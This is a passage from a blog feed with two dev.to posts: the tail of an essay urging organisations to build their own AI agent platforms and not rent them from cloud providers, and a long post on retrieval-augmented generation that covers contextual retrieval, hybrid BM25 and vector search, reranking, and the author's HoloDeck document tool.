&lt;li&gt;Write, test, and ship services at a pace that would've required a team of five&lt;/li&gt;
&lt;li&gt;Automate the operational drudgery that used to eat an entire SRE team's week&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'm not saying fire your engineers, far from it. I'm saying the &lt;em&gt;shape&lt;/em&gt; of the team changes. You don't need ten people doing ten things. You need two or three people who deeply understand your organisation, your architecture, and your constraints — and who can use AI to move at a pace that wasn't physically possible before 2024.&lt;/p&gt;

&lt;p&gt;This is &lt;em&gt;especially&lt;/em&gt; true for the kind of work that cloud providers want you to outsource. Agent orchestration? Pattern-heavy glue code. AI agents eat that for breakfast. Data pipeline wiring? Same. Deployment automation? Same. All the stuff that used to justify a managed service because "we don't have the headcount" — your headcount just got a 5x multiplier.&lt;/p&gt;

&lt;p&gt;Some may say that outsourcing all these to an AI Agent provided by an AI lab could be a material risk as well, and that's a fair point. But using AI coding agents to build your own internal platforms is a fundamentally different proposition than outsourcing your entire agent strategy to a third-party service. The former is about augmenting your internal capabilities, while the latter is &lt;strong&gt;about relinquishing control&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop Letting IT Gatekeep Developer Platforms
&lt;/h2&gt;

&lt;p&gt;OK, here's where I'm really going to step on some toes.&lt;/p&gt;

&lt;p&gt;If you're a large organisation thinking about this, your instinct is going to be: "Let's get IT to build a centralised platform." Don't. Please.&lt;/p&gt;

&lt;p&gt;I've lived through this movie. IT builds a "developer portal" (if you're lucky) that's actually a ticket queue with a React frontend. Need an environment? Raise a ticket. Need a database? Another ticket. Need a deployment slot? Ticket, two-week SLA, hope you weren't trying to ship something this quarter. By the time you're actually writing code, the business has moved on and someone's asking why "digital transformation" isn't delivering results.&lt;/p&gt;

&lt;p&gt;The starting point should be building &lt;em&gt;real&lt;/em&gt; developer platforms. Self-service. Automated. Opinionated where it matters, flexible where it doesn't. And here's the kicker — &lt;strong&gt;only developers will build what developers actually need.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Platform engineering is not an IT governance function. It's a software engineering discipline. The people building your internal platform need to be people who feel the pain of not having one. People who've waited three weeks for a staging environment and thought "I could build a better system than this in a weekend." With AI coding assistants, that thought is now literally true.&lt;/p&gt;

&lt;p&gt;Give a small, empowered team — even one or two devs — the mandate to build internal tooling. Give them Claude Code. Give them autonomy. Get IT out of the critical path for day-to-day development. Watch what happens.&lt;/p&gt;

&lt;h2&gt;
  
  
  Build the Moat Around What Actually Matters
&lt;/h2&gt;

&lt;p&gt;Here's the mental model I keep coming back to.&lt;/p&gt;

&lt;p&gt;Your organisation's moat is not its cloud infrastructure. It never was. Nobody ever won a competitive advantage because they had a really nice Kubernetes cluster. Your moat is your domain knowledge. Your data. Your processes. The software that encodes all of that into systems that work.&lt;/p&gt;

&lt;p&gt;Cloud infrastructure — provisioning VMs, managing databases, configuring load balancers — that's commodity toil. Important, but undifferentiated. It's exactly the kind of work AI agents are already good at handling.&lt;/p&gt;

&lt;p&gt;So here's what I think the play is:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Delegate the infrastructure toil to AI agents.&lt;/strong&gt; Use agentic coding assistants to automate your cloud operations. Let machines manage machines. This is what they're good at.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Build your agent platforms in-house.&lt;/strong&gt; Don't hand your agent orchestration to AI Foundry or Bedrock AgentCore. Use Claude Code to build your own. With one or two engineers driving AI, this is genuinely achievable now — and the result will be tailored to your domain, wired into your data, and owned by you. Not rented.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Spend your human engineering effort on what's actually unique to you.&lt;/strong&gt; The domain logic. The data models. The regulatory knowledge. The workflows that make your organisation yours. That's where engineers should be thinking, not fighting YAML configs for a managed service that doesn't quite do what you need.&lt;/p&gt;

&lt;p&gt;I'm not anti-cloud. I'm not suggesting anyone go rack servers. Use cloud compute, managed databases, managed networking — consume the commodity layers, absolutely. But stop outsourcing the &lt;em&gt;intelligence&lt;/em&gt; layer. Stop letting cloud providers become the operating system for your AI strategy. The tools to take it back exist today, right now, and the cost of doing it yourself just dropped by an order of magnitude.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Risk of Waiting
&lt;/h2&gt;

&lt;p&gt;Some organisations will read this and think "we're not ready." They'll wait. They'll commission a strategy paper. They'll form a committee. They'll wait for IT to assess the tools. They'll wait for a vendor to package it all up in a nice procurement-friendly bundle.&lt;/p&gt;

&lt;p&gt;And while they wait, they'll outsource the last engineering layers they had. They'll become fully dependent on platforms they don't understand, built by companies whose incentive is to keep them dependent for shareholder value. And when the pricing changes — and it always changes — they'll have zero internal capability to respond.&lt;/p&gt;

&lt;p&gt;The organisations that start now, even messily, even with a tiny team, even with imperfect first attempts — they'll build the muscle memory that matters. They'll discover that two engineers with AI coding assistants can build things that would have required twenty people three years ago.&lt;/p&gt;

&lt;p&gt;The cloud providers are betting you won't build. That the complexity will scare you off. That you'll keep paying rent on their platforms because it feels safer than trying.&lt;/p&gt;

&lt;p&gt;I think they're wrong. And I think more engineers are starting to feel the same way.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If you want to see what building these patterns looks like in practice, check out &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt; — it's my open-source agent experimentation platform where I'm putting my money where my mouth is.&lt;/em&gt;&lt;/p&gt;




</description>
    </item>
    <item>
      <title>RAG Is Dead. Long Live RAG. Or Is It?</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Sat, 07 Feb 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/rag-is-dead-long-live-rag-or-is-it-2h98</link>
      <guid>https://dev.to/jeremiahbarias/rag-is-dead-long-live-rag-or-is-it-2h98</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7yyxt1fdk9ayt91w15bi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7yyxt1fdk9ayt91w15bi.png" alt=" " width="800" height="436"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Heads up: this is a long one. Grab a coffee.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;There's a running joke in the AI engineering community: every six months, someone publishes a post declaring RAG dead. And every six months, the rest of us are still building retrieval pipelines, because the alternative — cramming a million pages into a context window and praying — doesn't actually work.&lt;/p&gt;

&lt;p&gt;So let me add to the pile. RAG is dead. Long live RAG. Or is it?&lt;/p&gt;

&lt;p&gt;Welcome to this rabbit hole.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we're covering
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;The Great Vector Gold Rush of 2023 (and why it mostly didn't work)&lt;/li&gt;
&lt;li&gt;GraphRAG's brief moment in the sun&lt;/li&gt;
&lt;li&gt;The Anthropic blog post that rewired my brain&lt;/li&gt;
&lt;li&gt;How I turned that into a tool for 800-page legislation (with reranking)&lt;/li&gt;
&lt;li&gt;Why structured data gets left out of every RAG conversation&lt;/li&gt;
&lt;li&gt;The agentic shift happening right now&lt;/li&gt;
&lt;li&gt;The information retrieval problem nobody actually solved&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The Great Vector Gold Rush
&lt;/h2&gt;

&lt;p&gt;Cast your mind back to 2023. ChatGPT had just lit the world on fire and suddenly every database vendor on the planet had a vector announcement to make. Postgres got &lt;code&gt;pgvector&lt;/code&gt;. Redis added vector similarity. Elasticsearch, MongoDB, Supabase — everyone scrambled to bolt on approximate nearest neighbour search like it was the new JSON column.&lt;/p&gt;

&lt;p&gt;And enterprise teams took the bait. The playbook was dead simple:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Take your documents&lt;/li&gt;
&lt;li&gt;Chunk them naively (every 500 tokens, maybe with some overlap)&lt;/li&gt;
&lt;li&gt;Embed them with &lt;code&gt;text-embedding-ada-002&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Stuff them into a vector store&lt;/li&gt;
&lt;li&gt;Wire up a chatbot&lt;/li&gt;
&lt;li&gt;Ship it. Call it "AI-powered knowledge management"&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Sound familiar? Yeah. Everyone did this.&lt;/p&gt;

&lt;p&gt;I watched it play out firsthand. Business teams at my organisation (I work for the Federal Government) would come to us, exasperated:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"We tried using Copilot with SharePoint. We even ingested everything into Dataverse. It can't seem to understand PDFs with tables! Also it hallucinated like nobody's business. Precision and recall scores were abysmal. The whole thing turned into unusable slop."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The frustration was real. The promise of "just ask your documents anything" crumbled the moment you needed an actual correct answer from an 800-page piece of legislation. And the root cause was always the same: &lt;strong&gt;nobody was taking the information retrieval problem seriously.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;They were treating retrieval as a checkbox — "we have a vector store, done" — when it's actually the hardest part of the whole pipeline.&lt;/p&gt;

&lt;h2&gt;
  
  
  GraphRAG and the Hype That Fizzled
&lt;/h2&gt;

&lt;p&gt;Then came GraphRAG. Microsoft Research published a paper, the community got excited, and suddenly everyone was building knowledge graphs out of their document corpora. The idea had elegance: model entities and relationships explicitly, then traverse the graph during retrieval to capture multi-hop reasoning.&lt;/p&gt;

&lt;p&gt;In practice? The extraction was brittle. The graphs were noisy. The latency was punishing. And for most use cases — "find me the section about reporting requirements in this regulation" — a well-built keyword index would have done the job in milliseconds.&lt;/p&gt;

&lt;p&gt;GraphRAG didn't die, exactly. It found its niche in certain analytical workloads. But as a general-purpose retrieval upgrade for enterprise document search? It fizzled. The gap between research demo and production system was a chasm.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Blog Post That Changed Everything (For Me)
&lt;/h2&gt;

&lt;p&gt;In late 2024, Anthropic's engineering team quietly published a blog post called &lt;a href="https://www.anthropic.com/engineering/contextual-retrieval" rel="noopener noreferrer"&gt;Contextual Retrieval&lt;/a&gt;. No fanfare. No "paradigm shift" language. Just a straightforward technique that made me stop what I was doing and redesign an entire tool.&lt;/p&gt;

&lt;p&gt;The core insight is embarrassingly simple: &lt;strong&gt;when you chunk a document, you destroy context. So put the context back before you embed.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's what I mean. Traditional RAG takes a chunk like &lt;em&gt;"The Administrator shall submit a report within 30 days"&lt;/em&gt; and embeds it in isolation. Which administrator? Which report? 30 days from what? The chunk lost all of that when it got ripped out of the document.&lt;/p&gt;

&lt;p&gt;Contextual Retrieval takes the same chunk and prepends a short, LLM-generated summary of where it sits in the document: &lt;em&gt;"This chunk is from Title IV, Chapter 2, Section 403(b) of the Clean Air Act, which covers administrative reporting requirements."&lt;/em&gt; Then you embed the whole thing.&lt;/p&gt;

&lt;p&gt;That's it. That's the technique.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Pipeline
&lt;/h3&gt;

&lt;p&gt;Let me draw it out, because this is where it gets interesting — Anthropic doesn't just add context to embeddings. They build a &lt;strong&gt;hybrid index&lt;/strong&gt; that combines vector search and BM25 keyword search, blended with Reciprocal Rank Fusion. The full pipeline looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  CONTEXTUAL RETRIEVAL PIPELINE (Anthropic)
═══════════════════════════════════════════════════════════════════════

  INDEXING PHASE
  ──────────────

  Full Document
       │
       ▼
  ┌─────────────────────────────────────┐
  │          Chunk Document             │
  │  (split into semantic chunks)       │
  └──────────────────┬──────────────────┘
                     │
          ┌──────────┴──────────┐
          │  For each chunk...  │
          ▼                     ▼
  ┌───────────────┐    ┌────────────────────────────┐
  │  Raw Chunk    │    │  Full Document + Chunk      │
  │               │───▶│         ↓                   │
  │  "The Admin   │    │  LLM generates context:     │
  │   shall       │    │  "This chunk is from        │
  │   submit a    │    │   Section 403(b) of the     │
  │   report      │    │   Clean Air Act, Title IV,  │
  │   within      │    │   covering administrative   │
  │   30 days"    │    │   reporting requirements."  │
  │               │    └─────────────┬──────────────┘
  └───────────────┘                  │
                                     ▼
                     ┌───────────────────────────────┐
                     │     Contextualized Chunk       │
                     │  "Section 403(b), Clean Air    │
                     │   Act, Title IV, admin         │
                     │   reporting. The Admin shall   │
                     │   submit a report within       │
                     │   30 days"                     │
                     └───────────────┬───────────────┘
                                     │
                    ┌────────────────┴────────────────┐
                    │                                  │
                    ▼                                  ▼
          ┌─────────────────┐              ┌─────────────────┐
          │  Embed (dense)  │              │  Index (BM25)   │
          │  via model      │              │  keyword index  │
          └────────┬────────┘              └────────┬────────┘
                   │                                │
                   ▼                                ▼
          ┌─────────────────┐              ┌─────────────────┐
          │  Vector Index   │              │  BM25 Index     │
          │  (semantic)     │              │  (lexical)      │
          └─────────────────┘              └─────────────────┘


  QUERY PHASE
  ───────────

  User Query: "What are the reporting requirements?"
       │
       ├──────────────────────────────┐
       │                              │
       ▼                              ▼
  ┌──────────────┐           ┌──────────────┐
  │ Vector Search│           │ BM25 Search  │
  │ (semantic    │           │ (keyword     │
  │  similarity) │           │  matching)   │
  └──────┬───────┘           └──────┬───────┘
         │                          │
         │  rank_1, rank_2, ...     │  rank_1, rank_2, ...
         │                          │
         └────────────┬─────────────┘
                      │
                      ▼
         ┌────────────────────────┐
         │  Reciprocal Rank       │
         │  Fusion (RRF)          │
         │                        │
         │  score(d) = Σ 1/(k+r)  │
         │  where k=60, r=rank    │
         │                        │
         │  Merges both result    │
         │  sets into one ranked  │
         │  list                  │
         └───────────┬────────────┘
                     │
                     ▼
         ┌────────────────────────┐
         │  Reranker (optional)   │
         │  Re-scores top-N       │
         │  for final ordering    │
         └───────────┬────────────┘
                     │
                     ▼
         ┌────────────────────────┐
         │  Top-K chunks → LLM   │
         │  for generation        │
         └────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the key thing most people miss: &lt;strong&gt;it's not just contextual embeddings.&lt;/strong&gt; The real power comes from the hybrid approach — vector search catches the semantic intent ("reporting requirements") while BM25 catches the exact terms ("Section 403(b)"). RRF merges both ranked lists so you get the best of both worlds without having to tune a linear combination weight.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Numbers
&lt;/h3&gt;

&lt;p&gt;The results are anything but simple:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Failure Rate&lt;/th&gt;
&lt;th&gt;Reduction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Baseline (naive RAG)&lt;/td&gt;
&lt;td&gt;5.7%&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;+ Contextual Embeddings&lt;/td&gt;
&lt;td&gt;3.7%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-35%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;+ Contextual Embeddings + BM25 (RRF)&lt;/td&gt;
&lt;td&gt;2.9%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-49%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;+ All of the above + Reranking&lt;/td&gt;
&lt;td&gt;1.9%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-67%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;From 5.7% down to 1.9%. That's not a typo — &lt;strong&gt;a 67% reduction in retrieval failures&lt;/strong&gt; just by preserving context and combining search modalities. And the cost? Roughly a dollar per million document tokens with prompt caching. In a world where a single hallucinated legal citation can cost a business real money, that's essentially free.&lt;/p&gt;

&lt;p&gt;What struck me wasn't just the effectiveness — it was the &lt;em&gt;simplicity&lt;/em&gt;. No graph construction. No elaborate multi-agent retrieval choreography. Just: understand your document's structure, preserve it through the chunking process, use both vector AND keyword search, and let the fusion algorithm sort it out.&lt;/p&gt;

&lt;h2&gt;
  
  
  From Insight to Implementation: The Hierarchical Document Tool
&lt;/h2&gt;

&lt;p&gt;This blog post became the direct inspiration for a new tool I'm building in &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt;, my open-source agent experimentation platform. I call it the &lt;strong&gt;Hierarchical Document Tool&lt;/strong&gt; , and it takes Anthropic's approach and pushes it further — specifically for the kind of deeply structured documents I deal with at work.&lt;/p&gt;

&lt;p&gt;The problem I'm solving is legislative analysis. We're talking about statutes, regulations, and policy documents that are 800 to 1,000 pages long, with intricate hierarchical structure: Titles, Chapters, Sections, Subsections, Paragraphs, Subparagraphs. A single piece of analysis might span multiple such documents. Getting retrieval wrong isn't just annoying — it means an agent cites the wrong section of law, or misses a critical cross-reference.&lt;/p&gt;

&lt;p&gt;Here's where the Hierarchical Document Tool goes beyond what Anthropic described:&lt;/p&gt;

&lt;h3&gt;
  
  
  Structure-aware chunking
&lt;/h3&gt;

&lt;p&gt;Instead of blindly splitting on token count, the tool parses markdown (converted from any source format) and chunks along structural boundaries. Every chunk retains its full parent chain as metadata:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;["Title I", "Chapter 2", "Section 203", "Subsection (a)", "Paragraph (1)"]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When a chunk is retrieved, you know &lt;em&gt;exactly&lt;/em&gt; where it lives in the document hierarchy. No more "this chunk mentions a 30-day deadline but I have no idea which part of which law it came from."&lt;/p&gt;

&lt;h3&gt;
  
  
  Contextual embeddings via LLM
&lt;/h3&gt;

&lt;p&gt;Following Anthropic's approach, each chunk is sent through a lightweight LLM call (Claude Haiku or anything with a large enough context window) that generates a 50–100 token context preamble from the full document and the chunk's structural location. A chunk like &lt;em&gt;"The Administrator shall submit a report within 90 days"&lt;/em&gt; gets prepended with something like: &lt;em&gt;"This chunk is from Section 203 of the Environmental Protection Act, Title IV, Chapter 2, which covers administrative reporting requirements for regulated entities."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The contextualized text — preamble plus original chunk — is what gets embedded and indexed. The whole context generation pipeline for a 100-page document costs roughly &lt;strong&gt;$0.03&lt;/strong&gt; with prompt caching, runs 10 chunks concurrently, and falls back gracefully to raw chunks if the LLM call fails. Three cents. For a hundred pages. I'll take that trade every time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hybrid search with tiered keyword strategy
&lt;/h3&gt;

&lt;p&gt;This is where it gets fun. The tool maintains &lt;strong&gt;three&lt;/strong&gt; parallel indices: dense (embedding) for semantic search, sparse (BM25) for keyword search, and exact match for precise lookups like section numbers (to be built).&lt;/p&gt;

&lt;p&gt;What makes this interesting is the keyword search layer. Not every vector store supports native hybrid search, so the tool uses a tiered strategy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Tier 1 — Native hybrid&lt;/strong&gt; : If your provider supports it (Azure AI Search, Weaviate, Qdrant), use the built-in hybrid capabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tier 2 — OpenSearch&lt;/strong&gt; : Route to an OpenSearch endpoint for production-grade BM25&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tier 3 — In-memory BM25&lt;/strong&gt; : Fall back to an in-memory index for development and testing&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All three search modalities run in parallel and merge via Reciprocal Rank Fusion (&lt;code&gt;score(d) = sum of weight_i / (k + rank_i)&lt;/code&gt;, with k=60 by default) with configurable weights.&lt;/p&gt;

&lt;p&gt;And because RRF is rank-based, it doesn't require score normalization across different search engines. The best BM25 result gets a big boost even if its raw score is on a different scale than the embedding similarity. This means you can tune the weights to favor precision (keyword) or recall (semantic) without worrying about score calibration.&lt;/p&gt;

&lt;p&gt;When someone searches for "Section 403(b)(2)", the exact match index catches it instantly. When they search for "What are the environmental reporting requirements?", the semantic index handles it. In practice, most queries benefit from all three.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reranking: the final 18% that matters
&lt;/h3&gt;

&lt;p&gt;Look at Anthropic's numbers again. Contextual embeddings + BM25 gets you from 5.7% to 2.9% — a 49% reduction. But adding a reranker on top pushes that to 1.9% — another 18 percentage points of improvement. That last mile matters a &lt;em&gt;lot&lt;/em&gt; when you're working with legal text where "close enough" isn't.&lt;/p&gt;

&lt;p&gt;Here's what reranking actually does: after RRF merges your vector and keyword results into a single ranked list, you take the top N candidates (say, 30) and pass them through a cross-encoder model that scores each candidate &lt;em&gt;in the context of the original query&lt;/em&gt;. Unlike embedding similarity — which compares pre-computed vectors — a cross-encoder sees the query and the document chunk together, which lets it catch nuances that embedding distance misses.&lt;/p&gt;

&lt;p&gt;The trade-off is latency. Cross-encoders are slower because they can't pre-compute anything — every query-document pair needs a forward pass. But we're talking about scoring 20–30 candidates, not your entire corpus. In practice, that's under 500ms, which is plenty fast for most use cases.&lt;/p&gt;

&lt;p&gt;Reranking isn't in HoloDeck yet — it's next on the roadmap. But I've already designed it as an opt-in extension for vectorstore tools, and the plan supports two providers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cohere Rerank API&lt;/strong&gt; — cloud-hosted, fast, no infrastructure to manage. Great for getting started&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;vLLM&lt;/strong&gt; — self-hosted reranking models for teams with data privacy requirements or who want to run open-source cross-encoders. vLLM exposes a Cohere-compatible &lt;code&gt;/v1/rerank&lt;/code&gt; endpoint, so the same client code works for both&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The config will be dead simple. Add &lt;code&gt;rerank: true&lt;/code&gt; to any vectorstore tool and you're done:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tools:
  - name: knowledge_search
    type: vectorstore
    config:
      index: product-docs
    rerank: true
    reranker:
      provider: cohere
      model: rerank-english-v3.0
      api_key: ${COHERE_API_KEY}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few things I'm particularly happy with in the design so far:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Candidate pool sizing&lt;/strong&gt; : By default, the reranker gets &lt;code&gt;top_k * 3&lt;/code&gt; candidates. If you're returning 10 results, the system fetches 30 from the initial search, reranks all 30, then returns the top 10. More candidates = better reranking quality, at the cost of slightly more latency. You can tune &lt;code&gt;rerank_top_n&lt;/code&gt; directly if you want to dial this in&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Graceful fallback&lt;/strong&gt; : If the reranker fails (network timeout, rate limit, service down), the system silently falls back to the original ranked results and logs a warning. Your search doesn't break just because the reranker had a bad day. Configuration errors like bad API keys still fail fast though — you want to know about those immediately, not discover them at 2am&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero breaking changes&lt;/strong&gt; : Existing vectorstore configs without &lt;code&gt;rerank: true&lt;/code&gt; work exactly as before. The whole thing is opt-in&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Definition and cross-reference extraction
&lt;/h3&gt;

&lt;p&gt;Legal and regulatory documents are &lt;em&gt;riddled&lt;/em&gt; with defined terms ("&lt;em&gt;Administrator&lt;/em&gt; means the Administrator of the Environmental Protection Agency") and cross-references ("as described in Section 201(a)(1)(b)"). If you've ever tried to read legislation, you know the pain — half the document is just pointing at other parts of the document.&lt;/p&gt;

&lt;p&gt;The tool detects definitions sections and extracts them into a separate, always-available reference. Cross-references are identified and stored so agents can navigate related sections.&lt;/p&gt;

&lt;p&gt;This is still evolving — planned improvements include explicit tools that let agents look up term definitions on demand and resolve section cross-references directly (more on this in the agentic shift section below).&lt;/p&gt;

&lt;h3&gt;
  
  
  The YAML
&lt;/h3&gt;

&lt;p&gt;And because HoloDeck is a no-code agent platform, all of this is configured through YAML:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tools:
  - name: legislative_search
    type: hierarchical_document
    source: ./regulations
    contextual_embeddings: true
    context_model:
      provider: azure_openai
      name: gpt-5-mini # use a cheap, fast model but with a large context window
      temperature: 0.0
    context_max_tokens: 100
    context_concurrency: 10
    chunking_strategy: structure
    max_chunk_tokens: 800
    semantic_weight: 0.5
    keyword_weight: 0.3
    exact_weight: 0.2
    # rerank: true # coming soon
    # reranker:
    # provider: cohere
    # model: rerank-english-v3.0

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One YAML block. Structure-aware chunking, contextual embeddings with a cheap LLM, triple-index hybrid search — and reranking once that lands. No Python required. I'm pretty happy with how this turned out.&lt;/p&gt;

&lt;h2&gt;
  
  
  Don't Forget Structured Data
&lt;/h2&gt;

&lt;p&gt;While we're on the topic of retrieval, there's another blind spot in the "RAG everything" approach that nobody talks about: &lt;strong&gt;structured data&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Most enterprise RAG discussions focus exclusively on unstructured content — PDFs, Word docs, policy manuals. But organisations sit on mountains of structured data in CSVs, JSON feeds, databases, and APIs. An agent doing legislative analysis might need to cross-reference a regulation with a structured dataset of enforcement actions, compliance filings, or budget allocations.&lt;/p&gt;

&lt;p&gt;Any serious RAG strategy needs to account for both:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Unstructured content&lt;/strong&gt; → chunking-embedding-retrieval pipeline&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Structured data&lt;/strong&gt; → query interfaces (SQL, API calls, structured search)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Treating everything as "documents to embed" is how you end up with a chatbot that can vaguely summarise a spreadsheet but can't tell you the exact value in row 47. Don't be that team.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Agentic Shift
&lt;/h2&gt;

&lt;p&gt;Meanwhile, the landscape is shifting under our feet. Tools like Claude Code, OpenAI Codex, and others are introducing sophisticated agentic workflows where the AI doesn't just retrieve — it &lt;em&gt;reasons about what to retrieve, how to retrieve it, and what to do with the results&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;I wrote about this in a previous post, &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;Agentic Memory: Bash + File System Is All You Need&lt;/a&gt;, exploring how advanced memory management for agents can be as simple as reading and writing files. The same principle applies to retrieval: the most effective systems aren't the ones with the most exotic retrieval algorithm. They're the ones where the agent has the right tools — lookup a definition, navigate to a section, search by keyword, search by concept — and the judgment to use them appropriately.&lt;/p&gt;

&lt;p&gt;This is why I'm building the Hierarchical Document Tool as a &lt;em&gt;toolkit&lt;/em&gt;, not a monolithic search endpoint. Today the tool exposes hybrid search with structure-aware results. But the roadmap includes giving agents explicit primitives:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;definition lookup tool&lt;/strong&gt; so the agent can resolve defined terms on demand ("What does 'Administrator' mean in this Act?")&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;section navigation tool&lt;/strong&gt; that lets agents traverse the document hierarchy directly ("Go to Title 1, Chapter 3, Section 201(a)(1)(b)")&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Instead of one big search call, the agent gets the building blocks to reason about information retrieval the way a human researcher would — look up a term, follow a cross-reference, search semantically, then search by keyword to confirm. That's the real unlock.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem That Was Never Solved
&lt;/h2&gt;

&lt;p&gt;Here's what I keep coming back to: &lt;strong&gt;information retrieval is a decades-old problem, and we haven't solved it.&lt;/strong&gt; We've just been cycling through new implementations of the same fundamental challenge.&lt;/p&gt;

&lt;p&gt;Before LLMs, we had TF-IDF, BM25, latent semantic analysis, learning-to-rank. These techniques powered search engines that actually worked, that billions of people relied on daily. Then the LLM wave hit, and somehow the industry collectively decided to replace all of that hard-won information retrieval knowledge with "just embed everything and do cosine similarity."&lt;/p&gt;

&lt;p&gt;That was never going to be enough. Embeddings are powerful for capturing semantic similarity, but they're terrible at exact matching, structured lookups, and preserving document hierarchy. BM25 is excellent at keyword precision but misses conceptual relationships. The answer — as Anthropic demonstrated with the hybrid pipeline above — is to combine them thoughtfully. And to respect the structure of the documents you're working with.&lt;/p&gt;

&lt;p&gt;The organisations I see struggling with RAG aren't struggling because the technology is bad. They're struggling because they skipped the boring parts: understanding their document structures, building proper indexing pipelines, implementing hybrid search, testing retrieval quality independently from generation quality. They jumped straight to the chatbot demo and wondered why it hallucinated.&lt;/p&gt;

&lt;h2&gt;
  
  
  RAG Isn't Dead. We Just Never Did It Right.
&lt;/h2&gt;

&lt;p&gt;The hype cycle wants to move on. Context windows are growing. Some argue we'll eventually just stuff everything into the prompt. Maybe. But for the foreseeable future — for the 800-page statutes, the multi-document regulatory analyses, the enterprise knowledge bases with tens of thousands of documents — retrieval is still the bottleneck, and getting it right still matters enormously.&lt;/p&gt;

